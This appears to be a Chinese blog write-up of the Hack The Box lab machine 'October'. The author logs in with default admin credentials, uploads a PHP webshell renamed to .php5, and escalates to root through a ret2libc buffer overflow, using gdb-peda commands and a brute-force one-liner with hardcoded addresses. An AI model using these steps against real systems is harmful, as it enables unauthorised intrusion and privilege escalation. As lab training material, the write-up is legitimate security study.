Hack the box靶机 October
搜了一下october
有漏洞
然后默认的后台是/backend
试了一下密码admin:admin
竟然进去了????
有文件上传功能
shel.php
抓包
改成*.php5
右侧click here
拿到权限
dirb也扫出来后台了
但是我都已经不需要了
接下来是缓存区溢出了
正在看
所以就写到这吧
看了一晚上+一个白天
算是明白原理以及利用了
算了,直接贴传送门吧
国外大佬写的靶机教程
很详细
大概就是
1.检查防护
2.查看调用函数
3.通过脚本创造一个字符串(大一点的)
4.找到覆盖EIP的字节
5.通过脚本检查字节所在这个字符串的哪个位置
6.找到地址
7.生成漏洞利用脚本
8.运行得到root权限
安装
1.apt-get install gdb
2.git clone https://github.com/longld/peda.git ~/peda
3.echo "source ~/peda/peda.py" >> ~/.gdbinit
在Kali运行
1.gdb ./ovrflw
2.aslr
3.pdisass main
4.checksec
5.(再打开一个终端)pattern create 150
6.(在gdb运行)r '粘贴生成字符串'
7.(再刚才新打开的终端运行)pattern_offset 0x41384141
然后在靶机上运行
1.gdb /usr/local/bin/ovrflw -q
2.b main
3.run
4.p system
5.find 得到的字符串1, +9999999, “/bin/sh”
6.x/s 得到的字符串2
7.p exit
8.while true; do /usr/local/bin/ovrflw $(python -c 'print "A" * 112+ "\x10\xc3\x59\xb7\x60\xf2\x58\xb7\xac\xeb\x6b\xb7"'); done
对于我现在的知识
解决它还是有点困难
有没有大佬推荐一下缓冲区溢出的学习教程的
奉上双膝
Hack the box靶机 October相关推荐
- Hack The Box靶机——Ambassador
文章目录 前言 一.Web部分 二.提权部分 前言 难度:中等,Hack The Box网站在线靶机.本文涉及知识点有:Grafana系统任意文件读取,CURL下载文件,SSL本地端口转发,Consu ...
- Hack the box靶机 Admirer
不能访问啊 wfuzz一下 wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,txt-php-html -u ...
- Hack the box靶机 Grandpa
migrate进程迁移 win的题怎么都是用msf做的呢 看大佬们没有不用msf的
- Hack the box靶机 Chatterbox
修改地址 把生成的字符串替换python里的
- Hack the box靶机 Soli
突破口是oracle 就是真的慢 我快吐了 scott/tiger 不知道为什么老是连接不上 给我整不会了 但是我重启了一下 换了一个端口 然后就好了
- Hack The Box——Traverxec
目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 内核提权 SUID提权 总结 简介 这个靶机还算比较简单,只需一步一步慢慢走下去就可以完成了.漏洞发现和利用都比较简单,使用已知漏洞可以直接获得we ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限
Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...
- Hack The Box - Starting Point - TIER 0
Hack The Box - Starting Point - TIER 0 Meow TASK 1 What does the acronym VM stand for? 首字母缩略词 VM 代表什 ...
最新文章
- 深度学习可解释性问题如何解决?图灵奖得主Bengio有一个解
- python使用imbalanced-learn的BorderlineSMOTE方法进行上采样处理数据不平衡问题
- 听过TB、PB级大数据,ZB级的大数据探索与应用实践是怎么样的?【附PPT】
- 如果服务器开机显示NObootable,电脑不能开机提示No bootable device怎么办?
- 国人主导研发的 HAWQ® 成 Apache® 顶级项目
- java jdbc连接oracle_Java使用JDBC连接Oracle 11gR2
- LabView学习笔记(十):条件结构
- 使用Dism++安装系统(新手勿尝试)
- RN开发关闭所有黄色警告弹出(console.warn())
- ubuntu系统下安装gcc
- Android之简洁天气
- QTcpServer和QTcpSocket使用详解
- qt 5.12.1 下载安装详细教程
- DH密钥交换在实践中的安全问题
- CSS基础(P45-P65)
- 选购发烧游戏台式计算机的内存储器,游戏发烧友福音 惠普暗影精灵5 Super游戏台式电脑评测...
- pytohn 操作excel表格常用模块 xlwt xlsxwriter
- 什么是独立站,独立站的作用是什么?
- 程序员是什么又代表这多少角色?你想过吗?
- pytorch股票预测
热门文章
- API接口安全思考和最佳实践
- css3橙色球形_CSS3橙色的星球绕轨道公转动画_html/css_WEB-ITnose -
- django html菜单,使用Django模板的导航菜单
- ARMV8体系结构简介:AArch64系统级体系结构之Self-hosted debug
- ipython怎么念_如何读取IPython%prun(profiler)命令的输出? - python
- 历年CSP-J(NOIP普及组)分类汇总目录
- C语言程序设计——用户密码输入与判断
- 详解视频封装格式之MP4
- 微信小程序——修改radio组件的大小
- PTA 7-114 用if-else语句编程百分制成绩转换为五分制成绩